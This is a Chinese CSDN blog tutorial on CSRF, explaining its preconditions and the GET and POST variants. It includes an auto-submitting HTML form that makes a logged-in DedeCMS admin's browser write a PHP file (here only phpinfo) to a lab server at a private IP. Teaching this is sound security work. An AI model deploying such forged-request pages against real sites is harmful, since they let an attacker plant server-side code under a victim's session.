CSRF跨站请求伪造

最新推荐文章于 2021-03-05 11:01:32 发布
最新推荐文章于 2021-03-05 11:01:32 发布
阅读量538 收藏 2
点赞数
分类专栏: web安全 文章标签: CSRF跨站请求伪造
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sdb5858874/article/details/80739297
版权
CSRF介绍:
CSRF中文名称:跨站请求伪造,是一种“ 挟持用户”在当前已登陆的Web应用程序上执行“ 非本意操作”的攻击方法。

一、CSRF回放攻击流程
套用老师所给的一张攻击原理图


从这张流程图里我们总结一下CSRF攻击生效所需要的两个必要条件
1.被攻击者 成功登陆信任站点A,并在 本地生成cookie
2.用户使用 同一浏览器不退出的情况下,访问带有CSRF代码的网站B

二、原理介绍
首先说明一点,我们并没有挟持用户,CSRF是 挟持用户浏览器发送请求
1.某些html标签是可以发送HTTP GET类型的请求的。
例如 <img>    <img src="http://www.baidu.com"/>
这就是一个简单的向通过当前页面标签实现向百度发送http_get的请求
浏览器渲染Img标签的时候,并不知道img标签中的SRC属性的值到底是不是一个图片,浏览器需要做的就是根据src里面的链接,发送一个http get请求,并且 带上当前浏览器在目标网站上的凭证,也就是cookie,返回结果以图片形式渲染
根据这个特性,可以挟持用户的浏览器携带用户的cookie发送任意请求

三、常见的CSRF漏洞分类
1.通过GET方式向服务器提交请求
2.通过POST方式提交请求
具体模板:
<form name='chao' action=" https://blog.csdn.net/sdb5858874" method="post" enctype="multipart/form-data">
    <input type="hidden" name="user" value="chao">
    <input type="hidden" name="password" value="123456789">
</form>
<script>document.chao.submit();</script>

举一个例子:
假设我是一个网站的后台管理员
我登陆之后,我的后台这里有一个上传功能
大家看一下这个文件上传页面,现在我们作为haker伪造一个CSRF攻击的页面
首先我们先随便上传一个文件,然后抓一下他的数据包
现在我们看到的这个数据包就是一个正常的,在服务器上创建文件的请求包
我们只需要将画红线的部分做成一个表单,
1.红线标注的第一个部分标注了我们要往哪个Ip下的哪个文件里提交数据(这部分要数写到 form表单的action中)
2.向服务器传送了我们创建文件的必要信息(这部分我们要作为表单数据,通过post的方式提交上去)
代码如下

<!DOCTYPE html>
<html>
<head>
    <title>chao</title>
</head>
<body>
<form name='chao' action="http
://192.168.3.84/DedeCMS-V5.7-UTF8-SP1/uploads/dede/file_manage_control.php" method="post">
    <input type="hidden" name="fmdo" value="edit">
    <input type="hidden" name="activepath" value="/DedeCMS-V5.7-UTF8-SP1/uploads/uploads">
    <input type="hidden" name="filename" value="wangchao.php">
    <input type="hidden" name="str" value="<?php phpinfo(); ?>">

</form>
<script>document.chao.submit();</script>
</body>
</html>


然后我作为后台管理员不慎点开了haker发给我的带有CSRF的网站,结果如下
wangchao.php这个文件就已经保存在服务器上了


白帽梦想家
关注
专栏目录
【项目实战】Web端常见的高风险漏洞与解决方法(CSRF跨站请求伪造 攻击)
本本本添哥
11-25 1098
CSRF(Cross-site request forgery 跨站请求伪造
【渗透测试笔记】八、CSRF跨站请求伪造)漏洞
【User Not Found】的博客
04-26 784
We are all in the gutter, but some of us are looking at the stars. 身在井隅,心向璀璨。 本文仅供学习交流,正确使用渗透测试,遵守相关法律法规,请勿用于非法用途。 目录实验环境关于漏洞漏洞挖掘漏洞预防下一篇:Brute force Attacks(暴力破解) 实验环境 本实验基于以下环境: 【渗透测试笔记】一、环境搭建(Vi...
CSRF(跨站请求伪造)原理与实践
V
08-05 500
CSRF原理与实践一、原理二、实践2.1 CSRF (get)与(post)2.2 CSRF结合XSS2.3 Token防止CSRF 一、原理 Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也称为"one click...
跨站请求伪造防御
wangyunfeis的博客
08-16 323
title: 跨站请求伪造防御 date: 2017-08-14 16:22:41 categories: 网络安全 tags: csrf --- 背景 最近安全问题越来越多,公司软件也面临出海,刚开始公司软件大部分部在公安内网,安全问题没有太多重视。最近买了安全公司的扫描软件,一扫扫出很多安全问题,其中有一个是跨站请求伪造问题。 常见的攻击模式 GET请求利用 使用GET请求
CSRF跨站请求伪造
weixin_41487522的博客
06-22 193
CSRF跨站请求伪造 什么是CSRFCSRF(Cross-site request forgery)跨站请求伪造:也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险
CSRF跨站请求伪造,含使用教程和测试工具
05-04
CSRF跨站请求伪造,使用OWASP CSRFTester工具可以抓取并伪造请求,其测试原理是,使用代理抓取我们在浏览器中访问过的所有的连接以及所有的表单等信息,通过在CSRFTester中修改相应的表单等信息,重新提交,相当于一...
CSRF 跨站请求伪造
bazzza的博客
12-29 393
文章目录CSRF 跨站请求伪造一、CSRF原理二、CSRF分类Get型Post型链接类型三、CSRF危害四、防御手段五、CSRF与XSS的区别CSRF本地漏洞复现一、有token复现失败的情况二、漏洞存在-csrf成功复现 CSRF 跨站请求伪造 一、CSRF原理 跨站请求伪造(Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的
Django CSRF跨站请求伪造防护过程解析
01-01
CSRF全称Cross-site request forgery(跨站请求伪造),是一种网络的攻击方式,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF。 攻击原理 1、用户访问正常的网站A,浏览器就会保存网站A...
Ajax--参数,csrf跨站请求伪造,serialize(),上传文件formdata
weixin_30254435的博客
11-14 143
https://cdn.bootcss.com/jquery-cookie/1.4.1/jquery.cookie.js. 一:参数,processData,contentType,traditional,dataType ######################------------data---------################ data: 当前aj...
CSRF(Cross-site request forgery 跨站请求伪造)
myfuturein的专栏
10-08 7026
CSRF(Cross-site request forgery 跨站请求伪造,也被称成为“one click attack”或者session riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,并且攻击方式几乎相左。XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CS
CSFR(跨站请求伪造)攻击与防御
zhaohong_bo的专栏
05-21 4733
一、CSRF是什么? CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 二、CSRF可以做什么? 你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,...
跨站请求伪造
weixin_30387663的博客
01-04 139
1. 什么是跨站请求伪造CSRF)  CSRF(Cross-site request forgery跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,并且攻击方式几乎相左。XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来...
跨站请求伪造CSRF
FEWY的博客
11-26 874
CSRF 介绍 CSRF,是跨站请求伪造(Cross Site Request Forgery)的缩写,是一种劫持受信任用户向服务器发送非预期请求的攻击方式。 通常情况下,CSRF 攻击是攻击者借助受害者的 Cookie 骗取服务器的信任,在受害者毫不知情的情况下以受害者名义伪造请求发送给受攻击服务器,从而在并未授权的情况下执行在权限保护之下的操作。 CSRF 攻击示例 这里有一个网站,用户可以看...
CSRF 跨站请求伪造的解决方法
Dai_yinian6的博客
06-27 428
CSRF包含请求体的请求都需要开启CSRFfrom flask_wtf.csrf import CSRFProtect ... app.config.from_object(Config) ... CSRFProtect(app) CSRFProtect只做验证工作,cookie中的 csrf_token 和表单中的 csrf_token 需要我们自己实现理清思路目前登录注册发起的 POST 请求...
跨站请求伪造CSRF)那些事儿
jklove9的博客
03-05 460
1:跨站请求伪造概念(Cross-site request forgery,CSRF) 攻击者会伪造一个请求请求的形式一般为一个链接),欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击也就完成了。 因此CSRF攻击也被称为“One click”攻击。 攻击者利用目标用户的身份,以目标用户的名义执行某些非法操作。 例如:以目标用户的名义发送邮件,发消息,盗取目标用户的账号,甚至购买商品,会泄露用户个人隐私。 攻击场景举例: (1)小黑想把Lucy的收货...
CSRF | 跨站请求伪造(推!图文超详细!)
qq_45300786的博客
08-26 588
CSRF原理: 二.CSRF可以做什么? 你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,虚拟货币转账…造成的问题包括:个人隐私泄露以及财产安全。    做一个小实验。 注册2个账号,一个是修改过的A账号的,然后用bp做成csrf的poc 然后把这个复制下来,做成html文件。 在注册个新的账号B,啥都不要写。 然后再去访问之前我们做好的html文件,之后我们就可以看到账号B有了账号
CSRF跨站请求伪造漏洞
最新发布
12-06
CSRF(Cross-site request forgery)跨站请求伪造是一种网络攻击方式,攻击者通过伪造用户请求来冒充用户身份,从而进行一些非法操作。攻击者通常会在第三方网站上设置陷阱,引诱用户点击链接或者访问页面,从而触发...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值